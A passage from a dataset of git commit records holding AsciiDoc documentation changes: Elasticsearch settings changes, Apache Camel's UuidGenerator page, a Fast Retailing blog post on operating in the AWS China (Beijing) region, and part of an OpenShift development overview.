provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `azure` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n\n==== Cross-cluster search settings renamed\n\nThe cross-cluster search remote cluster connection infrastructure is also used\nin cross-cluster replication. This means that the setting names\n`search.remote.*` used for configuring cross-cluster search belie the fact that\nthey also apply to other situations where a connection to a remote cluster as\nused. Therefore, these settings have been renamed from `search.remote.*` to\n`cluster.remote.*`. For backwards compatibility purposes, we will fallback to\n`search.remote.*` if `cluster.remote.*` is not set. For any such settings stored\nin the cluster state, or set on dynamic settings updates, we will automatically\nupgrade the setting from `search.remote.*` to `cluster.remote.*`. The fallback\nsettings will be removed in 8.0.0.\n","old_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. 
Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. 
Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `azure` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fede74db67a12f6b771878100a4470989b5cf98e","subject":"add missing documentation about SimpleUuidGenerator","message":"add missing documentation about SimpleUuidGenerator\n","repos":"tdiesler\/camel,apache\/camel,tadayosi\/camel,mcollovati\/camel,nikhilvibhav\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,alvinkwekel\/camel,apache\/camel,tadayosi\/camel,pax95\/camel,christophd\/camel,tdiesler\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,pax95\/camel,adessaigne\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,tdiesler\/camel,christophd\/camel,pax95\/camel,alvinkwekel\/camel,tdiesler\/camel,apache\/camel,christophd\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,mcollovati\/camel,alvinkwekel\/camel,gnodet\/camel,gnodet\/camel,nicolaferraro\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,gnodet\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,nicolaferraro\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,mcollovati\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/uuidgenerator.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/uuidgenerator.adoc","new_contents":"[[UuidGenerator-UuidGenerator]]\n= UuidGenerator\n\nStarting with *Camel 2.5*, Camel supports 3rd party UUID generator(s).\nThis is useful, if e.g. your messaging provider does not support UUID's\nwith a length of 36 characters (like Websphere MQ). Another useful\nscenario is to use a simple counter for testing purpose. 
With this it is\neasier to correlate the exchanges in the log\/debugger.\n\nCamel uses UUIDs in the exchange and message ids, and other unique ids\nit uses.\n\nYou only have to implement `org.apache.camel.spi.UuidGenerator` and tell\nCamel that it should use your custom implementation:\n\n[[UuidGenerator-ConfiguringfromJavaDSL]]\n== Configuring from Java DSL\n\n[source,java]\n----\ngetContext().setUuidGenerator(new MyCustomUuidGenerator());\n----\n\nWarning: You should not change the UUID generator at runtime (it should only be\nset once)!\n\n[[UuidGenerator-ConfiguringfromSpringDSL]]\n== Configuring from XML DSL\n\nCamel will configure this UUID generator by doing a lookup in the Spring\nbean registry to find the bean of the type\n`org.apache.camel.spi.UuidGenerator`.\n\n[source,xml]\n----\n<bean id=\"simpleUuid\" class=\"org.apache.camel.support.SimpleUuidGenerator\" \/>\n\n<camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\" \/>\n <to uri=\"mock:result\" \/>\n <\/route>\n<\/camelContext>\n----\n\n[[UuidGenerator-Providedimplementations]]\n== Provided implementations\n\nCamel comes with three implementations of\n`org.apache.camel.spi.UuidGenerator`:\n\n* `org.apache.camel.support.SimpleUuidGenerator` - This implementation\ninternally uses a `java.util.concurrent.atomic.AtomicLong` and increases the\nID for every call by one, starting with 1 as the first id.\n* `org.apache.camel.support.VanillaUuidGenerator` - This implementation uses\na randomly generated seed and a counter which increments by one. This generator\nis not unique per host or JVM.\n* `org.apache.camel.impl.engine.DefaultUuidGenerator` - This implementation\nuses a fast unique UUID generation that is cluster safe (similar to the uuid\ngenerator in ActiveMQ). This is the default implementation in use by Camel.\n
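\nIf none of these fit, a custom generator is a single small class. For illustration, the hypothetical `MyCustomUuidGenerator` from the Java DSL example above could be implemented as a simple counter, essentially what `SimpleUuidGenerator` does:\n\n[source,java]\n----\nimport java.util.concurrent.atomic.AtomicLong;\n\nimport org.apache.camel.spi.UuidGenerator;\n\npublic class MyCustomUuidGenerator implements UuidGenerator {\n\n \/\/ increases by one for every call, so the ids are easy to correlate in the log\/debugger\n private final AtomicLong counter = new AtomicLong();\n\n @Override\n public String generateUuid() {\n return String.valueOf(counter.incrementAndGet());\n }\n}\n----\n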
With this it is\neasier to correlate the exchanges in the log\/debugger.\n\nCamel uses UUIDs in the exchange and message ids, and other unique ids\nit uses.\n\nYou only have to implement `org.apache.camel.spi.UuidGenerator` and tell\nCamel, that it should use your custom implementation:\n\n[[UuidGenerator-ConfiguringfromJavaDSL]]\n== Configuring from Java DSL\n\n[source,java]\n----\ngetContext().setUuidGenerator(new MyCustomUuidGenerator());\n----\n\nWarning: You should not change the UUID generator at runtime (it should only be\nset once)!\n\n[[UuidGenerator-ConfiguringfromSpringDSL]]\n== Configuring from XML DSL\n\nCamel will configure this UUID generator by doing a lookup in the Spring\nbean registry to find the bean of the type\n`org.apache.camel.spi.UuidGenerator`.\n\n[source,xml]\n----\n<bean id=\"simpleUuid\" class=\"org.apache.camel.support.SimpleUuidGenerator\" \/>\n\n<camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\" \/>\n <to uri=\"mock:result\" \/>\n <\/route>\n<\/camelContext>\n----\n\n[[UuidGenerator-Providedimplementations]]\n== Provided implementations\n\nCamel comes with two implementations of\n`org.apache.camel.spi.UuidGenerator`:\n\n* `org.apache.camel.support.SimpleUuidGenerator` - This implementation use\ninternally a `java.util.concurrent.atomic.AtomicLong` and increase the\nID for every call by one. Starting with 1 as the first id.\n* `org.apache.camel.impl.engine.DefaultUuidGenerator` - This implementation\nuse a fast unique UUID generation that is cluster safe (similar to uuid generator in ActiveMQ)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e98d0054d7c94b2fdfeb9b5a5d86370a4378645f","subject":"small wording changes","message":"small wording changes\n","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-8-20-AWS-China.adoc","new_file":"_posts\/2015-8-20-AWS-China.adoc","new_contents":"= AWS China(Beijing) Region Tips\nKeito Fukuda <keito.fukuda@fastretailing.com>\n:toc:\n\nHi, there, my name is Keito Fukuda, a lead technical architect at Fast Retailing.\nToday I would like to talk about AWS China(Beijing) region since it is very unique from other AWS regions and you may want to know the discrepancies in advance of you starting to use it without making some efforts to figure it out on your own.\n\n== Fast Retailing\nLet me start with a little bit talking about our company Fast Retailing as there are some chances that you hear very first time and have no idea about us.\nWe Fast Retailing is one of global leading apparel companies and a holding company which owns various global apparel brands underneath such as UNIQLO, GU, they are born in Japan but spreading out to global markets. Theory, JBrand, they are originally from US but both have global penetration and large number of funs all over the world. Last but not least, Comptoir des Cotonniers and Princesse tam tam, which are from France.\nAs we have global reachability, of course we aggressively take advantage of AWS and its global regions for our systems. We as of today utilize Tokyo, Singapore, Virginia, California, Sydney, Ireland, Frankfrut, then of course China(Beijing) regions to provide our services to our global customers as well as systems to our global employees. 
The China(Beijing) region is especially important for us, as China is our 2nd biggest market; besides, there are some challenges due to unique legal and infrastructure restrictions.\n\n== Web Service to China\nAs described above, when we provide a web service in mainland China, there are some difficulties. I will quickly list the 2 significant challenges below and talk about them one by one in the following sections.\n\n. ICP Recordal\/License\n. Great Firewall\n\n=== ICP Recordal\/License\nAs you all may know, if you provide a web service in mainland China, it is necessary to acquire an ICP(Internet Content Provider) recordal or license from the China government. This recordal\/license requires us to have a legal entity inside of China and go through the required procedure. In addition, once you have acquired it, you are supposed to put it at the bottom of all of your web pages.\nWe Fast Retailing do hold several ICP recordals for our brands to provide web contents in mainland China, as you can see below.\n\n[format=\"csv\", options=\"header\"]\n.Fast Retailing ICP Recordal List\n|===\nDomain, Recordal No.\nuniqlo.com, \u6caaICP\u590709003223\u53f7-4\nuniqlo.cn, \u6caaICP\u590709003223\u53f7-1\ngu-global.com, \u6caaICP\u590713017798\u53f7-1\nfastretailing.com, \u6caaICP\u590709003223\u53f7-3\n|===\n\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_footer.png\n\n=== Great Firewall\nThis is another very well-known unique restriction in mainland China. You can find what it is and how it works somewhere online (please just google it or jump to https:\/\/en.wikipedia.org\/wiki\/Great_Firewall[wikipedia]). But in a nutshell, all inbound\/outbound traffic on HTTP(80)\/HTTPs(443) is monitored and can be blocked at the DNS level by the China government.\nEspecially when traffic goes out of mainland China, it is monitored, which makes the traffic roundtrip extremely slow.\nEven when network traffic stays inside of China, it is still unstable, especially if the traffic crosses the boundary between the North side, dominated by China Telecom, and the South side, dominated by China Unicom. Because of these reasons, when you provide web contents from somewhere outside of mainland China, you need to pay attention to the huge network latency in your system architecture design. This is the biggest reason which would make you want to have a completely independent infrastructure inside of mainland China, to overcome the network latency issue and be able to provide a sufficient user experience to your China customers or employees.\n\n= AWS China(Beijing) Region Uniqueness\nOkay, then let me dive deep into what exactly the differences are. Because of the China-unique restrictions described in the prior section, when you set up your web service in the AWS China(Beijing) region, there are several consideration points you need to keep in mind. Here I will tell you about each one of them which we have discovered so far through our operation in the China(Beijing) region.\n\n== Account\nFirst of all, let me talk about the AWS account. This is one of the things which work in a different way from all other AWS regions. In order to use the China region, you need a completely independent account, which is dedicated only to the China region and given only when you are authorized by AWS. Unlike a global AWS account, you cannot create your account on the fly by yourself. 
You first need to submit your information https:\/\/www.amazonaws.cn\/en\/sign-up\/[here], then wait for it to be verified and authorized.\n\n== Billing\nEven if you have multiple accounts, one of the great billing features which you can use with a Global account is `Consolidated Billing`, which allows you to consolidate all billings associated with all your accounts and make a single payment at once. However, unfortunately this does not cover the AWS China account. Once you get a China account, you need to register your billing information separately from your Global account, and it cannot be consolidated.\n\n== Support Plan\nSimilar to billing, as we cannot consolidate our China account with any other Global accounts, even if you already subscribe to an https:\/\/aws.amazon.com\/premiumsupport\/[AWS support plan], that support cannot be applied to cover your China account. If you need intensive support from AWS, you have to subscribe to https:\/\/www.amazonaws.cn\/en\/support-plans\/[another support plan] dedicated only to your China account.\n\n== Service Availability\nWhen it comes to AWS service coverage and availability, as of this writing, 2015\/08\/20, there are plenty of services we can already use, as listed below.\nEC2, S3, StorageGateway, Glacier, VPC, Direct Connect, IAM, Trusted Advisor, CloudTrail, CloudWatch, DynamoDB, ElastiCache, RDS, CloudFormation, EMR, Kinesis, SNS, SQS, SWF\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_service_list.png\nWe are really looking forward to Lambda and API Gateway support, as we will be heavily relying on these 2 services down the road. I hope they will become available in the China region soon.\nAnother AWS service which everybody needs but is not available yet is `CloudFront`. As I said, even if you have your system up and running in mainland China, there would still be some network instability you and your system users might face. This would make you want to have a CDN(Contents Delivery Network) between your users and your system inside of China. As `CloudFront` is not ready yet in the China region, we Fast Retailing utilize both `Akamai` and `China Cache` as CDNs in front of our systems.\nFor more details and the latest information, please refer to http:\/\/docs.amazonaws.cn\/en_us\/aws\/latest\/userguide\/services.html[the official online document] maintained by AWS.\n\n== ICP Recordal\/License\nAs mentioned above, it is a regulation to acquire an ICP recordal\/license whenever you provide web contents over HTTP(80)\/HTTPs(443) in mainland China. This is the reason that even after you set up your web service on top of EC2, S3 or whatever, you still cannot access your web service from the Internet. The very first time we found that an HTTP\/HTTPs GET could not be completed even though our system was completely ready, we really freaked out and had no idea what was happening...(yes, we should have read through all instructions upfront). You would get a 403(Forbidden) response without your ICP license No. associated with your China account. In order to get this done, you can either reach out to your AWS counterpart to get help on this, or directly send an email to `Sinnet`, who is an IDC-licensed provider responsible for supporting and verifying ICP recordals\/licenses for AWS customers, at `My Account` on your own to have them register it. This registration process and getting your ICP recordal\/license verified would take around a week (in our case, 5 business days). 
Then you would finally get your web service all ready.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_license.png\n\n== MFA\nOf course, protecting your account is one of the very important things you are also responsible for. In our case, we have a strict internal regulation to enable MFA(Multi Factor Authentication) on all AWS administrative accounts. In other words, we have been simply counting on MFA for all of our Global accounts. However, unfortunately MFA is not available yet for the China account, which was actually a huge surprise for us. We cannot simply rely on it like for all other accounts to make your account secure. I guess the only thing we can do for now then is to make your administrative account password as complex as possible, and that is what we do as of today. We are now pushing the AWS team really hard to get it ready. Let's wait without losing hope.\n\n== AMI\nDo you share and reuse your AMIs across accounts or regions? Unfortunately that is another restriction in the China account. We Fast Retailing also heavily rely on AMIs to make infra set-up as fast and efficient as possible. AMI is just awesome. Having said that, we are not allowed to copy an AMI taken in other global regions or your other accounts. So basically you need to set up your system, from middleware setup to deploying your app code, all on your own the very first time. Once you set it up, you can take an AMI out of it and use it to spin up another instance you need.\nIn addition, as you can easily imagine, yes, you cannot take advantage of the AWS Marketplace either. This can sometimes have huge implications for your setup operation.\nAs for Community AMIs, there are some Community AMIs already available even in the China region, but they are completely separated from the Community AMIs under Global accounts. You would find only very limited AMIs there. So it is recommended to first check the availability of a Community AMI you would like to use in the China account.\n\n== Auto-Recovery\nWe generally set Auto-Recovery on EC2 instances, especially when our EC2-based system cannot be run with multiple instances and it is really difficult to achieve high availability. Auto-Recovery brings us huge help in minimizing the down-time of your system without any manual operation on the fly, in case your instance somehow goes down. However unfortunately, Auto-Recovery is not ready yet in the China region.\n\n== Admin Console\nIf you do not have any problem in reading English, then you are totally fine. However, unlike Global accounts which support multiple languages in the admin console, the admin console of the China account is only in English and Simplified Chinese as of today. You can change the language in `Console Preferences`. This is another difference from the Global account.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_admin_console.png\n\n== Conclusion\nToday, I touched on the AWS China(Beijing) region and described all the unique aspects you should be aware of before you start using it. As you saw above, there are many differences compared to all the other global regions which you usually use. Some differences may be closed in the future, but there are still some differences that even AWS cannot do anything about, due to China's legal regulations. 
I hope you were at least able to get a sense of how different it is and what you need to keep in mind.\n","old_contents":"= AWS China(Beijing) Region Tips\nKeito Fukuda <keito.fukuda@fastretailing.com>\n:toc:\n\nHi there, my name is Keito Fukuda, and I am a lead technical architect at Fast Retailing.\nToday I would like to talk about the AWS China (Beijing) region, since it is very different from the other AWS regions, and you may want to know the discrepancies before you start using it rather than having to figure them out on your own.\n\n== Fast Retailing\nLet me start by saying a little about our company, Fast Retailing, as there is a chance you are hearing the name for the very first time and have no idea who we are.\nFast Retailing is one of the world's leading apparel companies, a holding company which owns various global apparel brands: UNIQLO and GU, which were born in Japan but are spreading into global markets; Theory and JBrand, which are originally from the US but have global penetration and a large number of fans all over the world; and, last but not least, Comptoir des Cotonniers and Princesse tam tam, which are from France.\nAs we have global reach, we naturally take aggressive advantage of AWS and its global regions for our systems. As of today we utilize the Tokyo, Singapore, Virginia, California, Sydney, Ireland and Frankfurt regions, and of course the China (Beijing) region, to provide services to our global customers as well as systems to our global employees. The China (Beijing) region is especially important for us, as China is our 2nd biggest market, but it also comes with some challenges due to unique legal and infrastructure restrictions.\n\n== Web Service to China\nAs described above, when we provide a web service in mainland China, there are some difficulties. I will quickly list the 2 most significant challenges below and then talk about them one by one.\n\n. ICP Recordal\/License\n. Great Firewall\n\n=== ICP Recordal\/License\nAs you all may know, if you provide a web service in mainland China, it is necessary to acquire an ICP (Internet Content Provider) recordal or license from the Chinese government. This recordal\/license requires us to have a legal entity inside China and to go through the required procedure. In addition, once you have acquired it, you are supposed to display it at the bottom of all of your web pages.\nWe at Fast Retailing hold several ICP recordals for our brands to provide web content in mainland China, as you can see below.\n\n[format=\"csv\", options=\"header\"]\n.Fast Retailing ICP Recordal List\n|===\nDomain, Recordal No.\nuniqlo.com, \u6caaICP\u590709003223\u53f7-4\nuniqlo.cn, \u6caaICP\u590709003223\u53f7-1\ngu-global.com, \u6caaICP\u590713017798\u53f7-1\nfastretailing.com, \u6caaICP\u590709003223\u53f7-3\n|===\n\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_footer.png[ICP recordal number in a page footer]\n\n=== Great Firewall\nThis is another very well-known restriction unique to mainland China. You can find out what it is and how it works online (please just google it, or jump straight to https:\/\/en.wikipedia.org\/wiki\/Great_Firewall[wikipedia]).
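If you want to see the effect for yourself before reading on, a crude round-trip probe is enough. This is only a sketch: the two hosts are hypothetical stand-ins for an origin outside and an origin inside mainland China, and `curl`'s standard timing variable does the measuring.\n\n[source,bash]\n----\n# Total fetch time against an origin hosted outside mainland China\ncurl -o \/dev\/null -s -w 'total: %{time_total}s\\n' https:\/\/global.example.com\/\n\n# The same measurement against an origin inside mainland China\ncurl -o \/dev\/null -s -w 'total: %{time_total}s\\n' https:\/\/cn.example.com.cn\/\n----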
But in a nutshell, all inbound\/outbound traffics on HTTP(80)\/HTTPs(443) are monitored and can be blocked at DNS level by China government.\nEspecially when traffic goes out of mainland China, it is monitored and makes traffic roundtrip extremely slow.\nEven network traffic completes inside of China, it is still unstable especially if traffic goes beyond a boundary between North side dominated by China telecom and South side dominated by China Unicom. Because of these reasons, when you provide web contents from somewhere outside of mainland China, you need to pay attention on huge network latency in your system architecture design. This is the biggest reason which would make you want to have a completely independent infrastructure inside of mainland China to overcome network latency issue and be able to provide sufficient user experience to your China customers or employees.\n\n= AWS China(Beijing) Region Uniqueness\nOkay, then let me deep dive on what are the differences exactly from here. Because of the China unique restrictions described in the prior section, when you set up your web service in AWS China(Beijing) region, there are several consideration points you need to keep in mind. Here I will tell you each one of them which we have discovered so far through our operation in China(Beijing) region.\n\n== Account\nFirst of all, let me talk about AWS account. This is one of things which work in different way from all other AWS regions. In order to use China region, you need a completely independent account, which is dedicated only for China region and given only when you are authorized by AWS. Unlike global AWS account, you cannot create your account on the fly by yourself. You first need to submit your information https:\/\/www.amazonaws.cn\/en\/sign-up\/[here], then have to wait to get it verified and authorized.\n\n== Billing\nEven if you have multi accounts, one of great features for billing which you can use in Global account is `Consolidated Billing`, which allows you to consolidate all billings associated with all your accounts and let you make a single payment at once. However unfortunately this does not cover AWS China account. Once you get a China account, you need to register your billing information separately from your Global account and it cannot be consolidated.\n\n== Support Plan\nSimilar to billing, as we cannot consolidate our China account with any other Global accounts, even if you already subscribe https:\/\/aws.amazon.com\/premiumsupport\/[AWS support plan], that support can not be applied and cover your China account. If you need intensive support from AWS, you have to subscribe https:\/\/www.amazonaws.cn\/en\/support-plans\/[another support plan] dedicated only for your China account.\n\n== Service Availability\nWhen it comes to AWS service coverage and availability. As of writing, 2015\/08\/20, there are plenty of services we can already use as listed below.\nEC2, S3, StorageGateway, Glacier, VPC, Direct Connect, IAM, Trusted Advisor, CloudTrail, CloudWatch, DynamoDB, ElasticCache, RDS, CloudFormation, EMR, Kinesis, SNS, SQS, SWF\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_service_list.png\nWe are really looking forward to Lambda support and API Gateway as we will be heavily relying on these 2 services down the road. I hope they will become available even in China region soon.\nAnother AWS service which everybody needs but is not available yet is `CloudFront`. 
As I said, even if you have your system up and running in mainland China, there would be still some network instability you and your system users might face. This would make you want to have CDN(Contents Delivery Network) between your users and your system inside of China. As `CloudFront` is not ready yet in China region, we Fast Retailing utilize both `Akamai` and `China Cache` as CDN in front of our systems.\nFor more details and the latest information, please refer to http:\/\/docs.amazonaws.cn\/en_us\/aws\/latest\/userguide\/services.html[the official online document] maintained by AWS.\n\n== ICP Recordal\/License\nAs mentioned above, it is a regulation to acquire an ICP recordal\/license whenever you provide web contents over HTTP(80)\/HTTPs(443) in mainland China. This is the reason that even after you set up your web service on top of EC2, S3 or whatever, you still cannot access to your web service from the Internet. Very first time when we found that HTTP\/HTTPs GET cannot be completed even after our system is completely ready, we really freaked out and had no idea what was happening...(yes, we should have read through all instructions upfront). You would get 403(Forbidden) response without your ICP license No. associated on your China account. In order to get this done, you can either reach out to your AWS counterpart to get a help on this or send an email to `Sinnet`, who is an IDC-licensed provider responsible for supporting and verifying ICP recordal\/license for AWS customers, to have them register it on account setting page on your own. This registration process and getting your ICP recordal\/license verified would take around a week(in our case, 5 business days). Then you would finally get your web service all ready.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_icp_license.png\n\n== MFA\nOf course, protecting your account is one of very important thing you are also responsible for. In our case, we have a strict internal regulation to enable MFA(Multi Factor Authentication) to all AWS administrative accounts. In other word, we have been simply counting on MFA for all of our Global accounts. However, unfortunately MFA is not available yet in China account, which was actually huge surprise for us. We cannot simply rely on it like all other accounts to make your account secure. I guess only one thing we can do for now then is to make your administrative account password as complex as possible, and that is what we do as of today. We are now pushing AWS team really hard to get it ready. Let's wait without losing the hope.\n\n== AMI\nDo you share and reuse your AMI across accounts or regions? Unfortunately that is another restriction in China account. We Fast Retailing also heavily rely on AMI to make infra set-up as fast and efficient as possible. AMI is just awesome. Having said that, we are not allowed to copy an AMI taken in other global regions or your other accounts. So basically you need to set up your system from middleware setup to deploying your app codes all on your own at very first time. Once you set it up, you can take an AMI out of it and use it to spin up another instance you need.\nIn addition, as you can easily imagine, yes, you cannot take advantage of AWS Marketplace either. This would sometimes make huge implication to your setup operation.\nAs for Community AMI, there are some Community AMIs already available even in China region, but they are completely separated from Community AMIs under Global accounts. 
You would find only very limited AMIs there. So it is recommended to check availability of an Community AMI you would like to use in China account first.\n\n== Auto-Recovery\nWe do generally set Auto-Recovery on EC2 instances, especially when our EC2 based system cannot be run together with multi-instances and it is really difficult to have high-availability. Auto-Recovery brings us huge help in minimizing down-time of your system without any manual operation on the fly in case your instance somehow goes down. However unfortunately, Auto-Recovery is not ready yet in China region.\n\n== Admin Console\nI hope you do not have any problem in reading English, then you are totally fine. However unlike Global accounts which support multi-languages in admin console. Admin console of China account is only in English as of today. This is another difference from Global account.\nimage::http:\/\/fastretailing.github.io\/blog\/images\/china_admin_console.png\n\n== Conclusion\nToday, I touched on AWS China(Beijing) region and described all uniquenesses you should be aware of prior you start using it. As you saw above, there are many differences compared to all other global regions which you usually use. Some differences may be filled in the future, but there are still some differences even AWS cannot do anything on due to China legal regulation. I hope you were able to at least get a sense of idea how different it is and what you need to keep in mind.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"dce6f2ca83be4b8d04761ba889adfbfd42c2ede6","subject":"Issue-30558: Grammatical change","message":"Issue-30558: Grammatical change\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"architecture\/understanding-development.adoc","new_file":"architecture\/understanding-development.adoc","new_contents":"[id=\"understanding-development\"]\n= Understanding {product-title} development\ninclude::modules\/common-attributes.adoc[]\n:context: understanding-development\ntoc::[]\n\nTo fully leverage the capability of containers when developing and running\nenterprise-quality applications, ensure your environment is supported by tools\nthat allow containers to be:\n\n* Created as discrete microservices that can be connected to other\ncontainerized, and non-containerized, services. For example, you might want to\njoin your application with a database or attach a monitoring application to it.\n\n* Resilient, so if a server crashes or needs to go down for maintenance or to be\ndecommissioned, containers can start on another machine.\n\n* Automated to pick up code changes automatically and then start and deploy new\nversions of themselves.\n\n* Scaled up, or replicated, to have more instances serving clients as demand\nincreases and then spun down to fewer instances as demand declines.\n\n* Run in different ways, depending on the type of application. For example, one\napplication might run once a month to produce a report and then exit. 
Another\napplication might need to run constantly and be highly available to clients.\n\n* Managed so you can watch the state of your application and react when\nsomething goes wrong.\n\nContainers\u2019 widespread acceptance, and the resulting requirements for tools and\nmethods to make them enterprise-ready, resulted in many options for them.\n\nThe rest of this section explains options for\nassets you can create when you build and deploy containerized Kubernetes\napplications in {product-title}. It also describes which approaches you might\nuse for different kinds of applications and development requirements.\n\n[id=\"developing-containerized-applications\"]\n== About developing containerized applications\n\nYou can approach application development with containers in many ways, and\ndifferent approaches might be more appropriate for different situations. To\nillustrate some of this variety, the series of approaches that is presented\nstarts with developing a single container and ultimately deploys that container\nas a mission-critical application for a large enterprise. These approaches\nshow different tools, formats, and methods that you can employ with containerized\napplication development. This topic describes:\n\n* Building a simple container and storing it in a registry\n* Creating a Kubernetes manifest and saving it to a Git repository\n* Making an Operator to share your application with others\n\n[id=\"building-simple-container\"]\n== Building a simple container\n\nYou have an idea for an application and you want to containerize it.\n\nFirst you require a tool for building a container, like buildah\u00a0or docker,\nand a file that describes what goes in your container, which is typically a\nlink:https:\/\/docs.docker.com\/engine\/reference\/builder\/[Dockerfile].\n\nNext, you require a location to push the resulting container image so you can\npull it to run anywhere you want it to run. This location is a container\nregistry.\n\nSome examples of each of these components are installed by default on most\nLinux operating systems, except for the Dockerfile, which you provide yourself.\n\nThe following diagram displays the process of building and pushing an image:\n\n.Create a simple containerized application and push it to a registry\nimage::create-push-app.png[Creating and pushing a containerized application]\n\nIf you use a computer that runs {op-system-base-full} as the operating\nsystem, the process of creating a containerized application requires the\nfollowing steps:\n\n. Install container build tools: {op-system-base} contains a set of tools that includes\npodman, buildah, and skopeo that you use to build and manage containers.\n. Create a Dockerfile to combine base image and software: Information about\nbuilding your container goes into a file that is named `Dockerfile`. In that\nfile, you identify the base image you build from, the software packages you\ninstall, and the software you copy into the container. You also identify\nparameter values like network ports that you expose outside the container and\nvolumes that you mount inside the container. Put your Dockerfile and the\nsoftware you want to containerize in a directory on your {op-system-base} system.\n. Run buildah or docker build: Run the `buildah build-using-dockerfile` or\nthe `docker build`\u00a0command to pull your chosen base image to the local system and\ncreate a container image that is stored locally.\u00a0You can also build containers\nwithout a Dockerfile by using buildah.\n. 
